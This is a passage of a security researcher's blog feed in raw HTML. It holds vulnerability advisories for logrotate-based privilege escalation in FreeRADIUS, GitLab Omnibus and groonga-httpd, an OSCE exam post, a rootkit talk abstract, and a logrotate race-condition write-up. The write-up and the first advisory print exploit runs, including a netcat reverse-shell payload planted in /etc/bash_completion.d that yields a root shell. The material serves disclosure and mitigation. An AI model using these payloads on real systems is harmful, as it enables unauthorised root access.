style="color: #000000;">28</span> <span style="color: #000000;">2018</span> grub <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> radiusd radiusd <span style="color: #000000;">33</span> May <span style="color: #000000;">12</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;if [ \<span style="color: #780078;">`id -u\`</span> -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &amp;); fi&quot;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ nc <span style="color: #660033;">-nvlp</span> <span style="color: #000000;">3333</span> listening on <span style="color: #7a0874; font-weight: bold;">&#91;</span>any<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">3333</span> ... connect to <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> from <span style="color: #7a0874; font-weight: bold;">&#40;</span>UNKNOWN<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">55526</span> <span style="color: #c20cb9; font-weight: bold;">id</span> <span style="color: #007800;">uid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">gid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">groups</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre></div></p> <h4>Vulnerable Versions</h4> <p>All versions including 3.0.19</p> <h4>Tested Versions</h4> <p>Name : freeradius<br /> Architecture: x86_64<br /> Version: 3.0.13<br /> Release: 9.el7_5</p> <h4>Impact</h4> <p>An attacker who already achieved a valid shell as user “radiusd” could elevate the privileges to “root”. The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h4>Mitigation</h4> <p>Add “su radiusd:radiusd” to all log sections in /etc/logrotate.d/radiusd.<br /> By keeping SELinux in "Enforcing" mode, the “radiusd” user will be limited in the directories he can write to.</p> <h4>References:</h4> <ul> <li><a href="https://access.redhat.com/security/cve/cve-2019-10143">https://access.redhat.com/security/cve/cve-2019-10143</a></li> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a></li> </ul> <h4>Vendor Contact Timeline</h4> <p>2019-05-01Contacting RedHat</p> <p>2019-05-07RedHat opens issue at the vendor bugtracker</p> <p>2019-05-23CVE gets assigned to the issue</p> <p>2019-05-24FreeRadius is skeptical about the “security” impact.</p> <p>2019-11-05Public disclosure</p> <h4>Notes</h4> <p>This CVE is disputed because the vendor <a href="https://freeradius.org/security/">stated</a> that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user “radiusd”.&nbsp; CVE’s are not only assigned for vulnerabilities but also for exposures that allow attacker to have a stronger impact after a successful attack. Therefore we believe that it is important to file this issue as a security related bug.</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius">https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=283&amp;2=comment&amp;3=comment" token="xzgwb9J5RcAW7IeFIQPIKtSnh-R_KbIEGwnvGSH1LZI"></drupal-render-placeholder> </section> Mon, 02 Dec 2019 18:11:22 +0000 Hoti 283 at https://tech.feedyourhead.at I "tried harder" and passed another exam https://tech.feedyourhead.at/content/osce <span class="field field--name-title field--type-string field--label-hidden">I &quot;tried harder&quot; and passed another exam</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="osce emblem" data-entity-type="file" data-entity-uuid="0c71047f-4663-40f4-989e-5d8fb52257bb" height="88" src="/sites/default/files/inline-images/offsec-student-certified-emblem-rgb-osce.png" width="687" /></p> <p>The <a href="https://www.offensive-security.com/ctp-osce/">"Offensive Security Certified Expert" (OSCE) </a>is earned by passing an extraordinary exam after the "Cracking The Perimeter"-course. <a href="https://tech.feedyourhead.at/content/oscp">The OSCP(Offsensive Security Certified Professional)</a> is strongly focused on pentesting. The OSCE is compared to the OSCP more about writing exploits. Students learn about <a href="https://www.offensive-security.com/documentation/cracking-the-perimeter-syllabus.pdf">exploiting web vulnerabilities, Anti-Virus-evasion, Fuzzing, Buffer Overflows and exploiting network vulnerabilities</a>. After the course I was very proficient in using a debugger like Immunity Debugger or OllyDBG.  The OSCE course is different than the OSCP. In the OSCP you have a big lab to practice and this guides you what you have to learn and figure out by yourself. In the OSCE there are a couple of machines and some exercises. You have to find out by your self how to get a deep understanding of the methods that are used in those exercises.</p> <p>The 48 hour exam was very hard for me. Even though I found some sleep, I really needed most of the time to solve the exercises. In the end I passed the exam on my first attempt. My recommendations for people who want to pass the OSCE are: do the OSCP first because it prepares you for the OSCE. Go through the <a href="https://www.pentesteracademy.com/course?id=3">SLAE32</a> for practicing assembler and shellcoding. During and after the course practice a lot and think about variations of the methods and exploits so that you get a very deep understanding of each course module.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Nov 10 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=281&amp;2=comment&amp;3=comment" token="KYveFfDzLjOT9ZYKKKT_YIMdXUoD0_RHvVkJlyx_iqI"></drupal-render-placeholder> </section> Sun, 10 Nov 2019 08:25:47 +0000 Hoti 281 at https://tech.feedyourhead.at CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741 <span class="field field--name-title field--type-string field--label-hidden">CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>Identifier: AIT-SA-20190930-01</li> <li>Target: GitLab Omnibus</li> <li>Vendor: GitLab</li> <li>Version: 7.4 through 12.2.1</li> <li>Fixed in Version: 12.2.3, 12.1.8 and 12.0.8</li> <li>CVE: CVE-2019-15741</li> <li>Accessibility: Local</li> <li>Severity: Low</li> <li>Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</li> </ul><h3>Vulnerability Description</h3> <p>GitLab Omnibus sets the ownership of the log directory to the system-user "git", which might let local users obtain root access because of unsafe interaction with logrotate.</p> <h3>Vulnerable Versions</h3> <p>7.4 through 12.2.1</p> <h3>Impact</h3> <p>An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”. The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h3>Advisory URL</h3> <p><a href="http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus">http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus</a></p> <h3>References:</h3> <ul><li><a href="https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/">https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/</a> </li> <li><a href="https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380">https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380</a> </li> <li><a href="https://hackerone.com/reports/578119">https://hackerone.com/reports/578119</a></li> </ul><p> </p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 04 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=279&amp;2=comment&amp;3=comment" token="tPzTCpXOHPQznS0cKjokuCN09WJl_ncAA7gp79vmOxc"></drupal-render-placeholder> </section> Fri, 04 Oct 2019 11:25:05 +0000 Hoti 279 at https://tech.feedyourhead.at Privilege escalation in groonga-httpd (CVE-2019-11675) https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd <span class="field field--name-title field--type-string field--label-hidden">Privilege escalation in groonga-httpd (CVE-2019-11675)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: Debian packages of groonga/-httpd 6.1.5-1</li> <li>Software-Version: 6.1.5-1</li> <li>User-Interaction: Not required</li> <li>Impact: Local root</li> <li>CVE: CVE-2019-11675</li> </ul> <h3>Detailed Description</h3> <p>The path of the logdirectory of groonga-httpd can be manipulated by user groonga:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>groonga total <span style="color: #000000;">8</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">1296</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> groonga.log drwxr-xr-x <span style="color: #000000;">2</span> groonga groonga <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">55</span> httpd</pre></div></pre> <p>The files in /var/log/groonga/httpd/*.log are once a day rotated by logrotate as user root with the following config:</p> <pre> /var/log/groonga/httpd/*.log { daily missingok rotate 30 compress delaycompress notifempty create 640 groonga groonga sharedscripts postrotate . /etc/default/groonga-httpd if [ x"$ENABLE" = x"yes" ]; then /usr/bin/curl --silent --output /dev/null \ "http://127.0.0.1:10041/d/log_reopen" fi endscript } </pre> <p>Due to <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">logrotate is prone to a race-condition</a> it is possible for user "groonga" to replace the directory /var/log/groonga/httpd with a symbolik link to any directory(for example /etc/bash_completion.d). logrotate will place files AS ROOT into /etc/bash_completition.d and set the owner and group to "groonga.groonga". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then.</p> <h3>Exploit</h3> <p>A proof-of-concept exploit can be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <h3>Mitigation</h3> <p>The problem can be mitigated by changing the owner and group of /var/log/groonga to root, or by using the "su option" inside the logrotate-configfile.</p> <h3>Credits</h3> <p>This bug was discovered by Wolfgang Hotwagner(https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=278&amp;2=comment&amp;3=comment" token="gm3BXsVi-55Kr8NZ8Sqnkq-hgDkw5pOYeXcWUQ1uut0"></drupal-render-placeholder> </section> Tue, 07 May 2019 20:32:56 +0000 Hoti 278 at https://tech.feedyourhead.at Anatomy of a Linux container rootkit https://tech.feedyourhead.at/content/anatomy-of-a-linux-container-rootkit <span class="field field--name-title field--type-string field--label-hidden">Anatomy of a Linux container rootkit </span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This year I gave a talk at the <a href="https://eh19.easterhegg.eu">Easterhegg 2019</a> about a Linux kernel rootkit that can handle containers. I mainly presented my Bachelor work from 2017 with some improvements.</p> <h2>Abstract</h2> <p>Linux Containers are becoming increasingly popular. Therefore, it is likely that there will be an increase of attacks against container systems. After successfully attacking all the security mechanisms of a container system, a “rootkit“ could be planted. This talk provides details of the anatomy of such a rootkit. First the main functions of rootkits are explained. After a brief introduction of Linux Containers and Linux Kernel Rootkits, a Kernel Rootkit called “themaster“, developed by the author of this thesis, is described and explained. Well known rootkit methods are used to implement functions to hide resources and escalate privileges. Results indicate that in container systems, patching system calls are the preferred method for functions which are globally accessible. For providing rootkit functionality in specific containers, patching the virtual file system is the better approach. A special backdoor for breaking out of the container is also applied and “themaster“ operates stealthily.</p> <h2>Talk</h2> <p><iframe allowfullscreen="" frameborder="0" height="576" src="https://media.ccc.de/v/eh19-168-anatomie-eines-containerfhigen-linux-kernel-rootkits/oembed" width="800"></iframe></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/kernel" hreflang="en">Kernel</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/docker" hreflang="en">Docker</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=277&amp;2=comment&amp;3=comment" token="A4P5IdLVLXs7imc4kAPeqdjBNNH5UZ2lfM9NktsbF-U"></drupal-render-placeholder> </section> Tue, 07 May 2019 20:03:34 +0000 Hoti 277 at https://tech.feedyourhead.at Details of a logrotate race-condition https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition <span class="field field--name-title field--type-string field--label-hidden">Details of a logrotate race-condition</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p> </p> <p>Logrotate is prone to a race-condition on systems with a log directory that is in control of a low privileged user. A malicious user could trick logrotate to create files in any directory if it is executed as root. This might lead into a privileged escalation.</p> <h2>Description</h2> <p>In the linux man page logrotate is described as follows:</p> <blockquote> <p><strong>logrotate</strong> is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large.</p> </blockquote> <p>On most linux distributions, logrotate is executed automatically once a day as user root.</p> <p>Logrotate supports different methods for creating new files. For example the directive "copy" makes a copy of the logfile and "create" creates a new empty logfile after rotating. If someone exchanges the log directory with a symbolic link just before creating the new logfile, logrotate will put the new file into a different directory.</p> <p>As shown in the diagram below such a scenario can be exploited if logrotate runs as user root and a low privileged user is in control of the path to the log directory. If this user exchanges the log directory with a symbolic link at the right time, logrotate will write the new file into the linked directory. After that the permissions of the created file will be adjusted and the attacker might have write access to that file.</p> <p><img alt="logrotate race-condition squence diagram" data-entity-type="file" data-entity-uuid="7107350b-2651-4742-bc62-18893ffd5e17" src="/sites/default/files/inline-images/sequence.png" /></p> <h2>Exploit</h2> <p>The race-condition can be exploited by setting a inotify-hook at the logfile. As soon as logrotate hits the logfile, the exploit gets notified and exchanges the log directory by a symbolic link to /etc/bash_completion.d. Logrotate will then create the new logfile into /etc/bash_completion.d as root and will adjust the owner and permissions of that file afterwards. The new logfile will be writable if logrotate is configured to set the owner of the file to the uid of the malicious user. Therefore the attacker can write a payload for a reverse shell into this file. As soon as root logs in, the reverse shell will be executed and spawns a root shell for the attacker.</p> <p>An implementation of such an exploit could be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <p>Using inotify has its limitations. It is too slow on filesystems that are on top of lvm2-volumes or overlayfs.</p> <h2>Examples</h2> <p>The following examples show different setups in which logrotate can be exploited:</p> <h3>1) Logfile owner is a user. Compress option is set</h3> <p>In this example the path is in control of user alice and the “compress”-directive is set in logrotate. The exploit hooks the IN_OPEN-operation of the file file.log.1. After the daily run of logrotate, a file with owner alice can be found at <i>/</i><i>etc/bash_completion.d/file.log.1.gz.</i></p> <p>The log directory is inside the home directory of user alice:</p> <pre><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  drwxr-xr-x <span style="color: #000000;">2</span> alice alice <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> 09:<span style="color: #000000;">40</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir </pre></div></pre> <p>Alice has permissions for writing to the logfile:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> alice alice <span style="color: #000000;">200000</span> Apr <span style="color: #000000;">30</span> 09:<span style="color: #000000;">40</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p>The directive "compress" is used inside the logrotate configuration:</p> <pre> <code> /home/alice/logdir/file.log { daily rotate 12 missingok notifempty size 1k compress } </code></pre> <p>Alice runs the exploit by setting the hook to file.log.1 and with the parameter for compression. The exploit gets executed when cron runs logrotate as root:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #666666;">alice@localhost$ </span>.<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-c</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log.1 Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log.1... Renamed <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir with <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span></pre></div></pre> <p>The compressed logfile is created in /etc/bash_completion.d with owner alice:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> alice alice <span style="color: #000000;">200053</span> Apr <span style="color: #000000;">30</span> 09:<span style="color: #000000;">40</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>file.log.1.gz</pre></div></pre> <h3>2) Logfile owner is root.root but with acl’s that permit a user to write the logfile.</h3> <p>This example illustrates a case where the insecure configuration is not obvious. User root owns the complete path and the logfile. But there are ACL’s set that allows user www-data to modify the directory /var/www/project and the logfile /var/www/project/logdir/file.log. As soon as logrotate triggers the exploit, a new file /etc/bash_completion.d/file.log will be created and the ACL’s copied.</p> <p>Permissions of the log directory. It is owned by root but ACL’s are in use:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxrwxr-x+ <span style="color: #000000;">2</span> root root <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:09 <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir</pre></div></pre> <p>The logfile is also woned by root with ACL’s set:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">-rw-rw-r--+ <span style="color: #000000;">1</span> root root <span style="color: #000000;">12</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:09 <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log</pre></div></pre> <p>Access control list of /var/www/project:</p> <pre> <code> # file: var/www/project # owner: root # group: root user::rwx user:www-data:rwx group::r-x mask::rwx other::r-x </code></pre> <p>Access control list of /var/www/project/logdir:</p> <pre> <code> # file: var/www/project/logdir # owner: root # group: root user::rwx user:www-data:rwx group::r-x mask::rwx other::r-x default:user::rwx default:user:root:rwx default:user:www-data:rwx default:group::r-x default:mask::rwx default:other::r-x </code></pre> <p>Logrotate configuration with "create root root":</p> <pre> <code> /var/www/project/logdir/file.log { daily rotate 12 missingok notifempty size 1k create root root } </code></pre> <p>www-data executes the exploit and waits until logrotate will be started by cron:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span></pre></div></pre> <p>The new file is created in /etc/bash_completition.d with owner root and with ACL’s set:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"> -rw-rw-r--+ <span style="color: #000000;">1</span> root root <span style="color: #000000;">0</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">16</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p>Access control list of /etc/bash_completion.d/file.log:</p> <pre> <code> # file: etc/bash_completion.d/file.log # owner: root # group: root user::rw- user:root:rwx #effective:rw- user:www-data:rwx #effective:rw- group::r-x #effective:r-- mask::rw- other::r-- </code></pre> <h3>3) Parent directory is secure and owned by root, but another directory above the parent is writable by a user. The logfile is owned by root.</h3> <p>This example shows that it is not enough to ensure that the logdir and its parent is owned by root. As long as one directory of the complete path can be modified by a user, logrotate could be exploited.</p> <p>Root owns /var/www/project/html:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x <span style="color: #000000;">3</span> root root <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">26</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span> </pre></div></pre> <p>Root owns /var/www/project/html/logdir/:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  drwxr-xr-x <span style="color: #000000;">2</span> root root <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">28</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span> </pre></div></pre> <p>Only root can write the logfile:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">0</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">28</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: 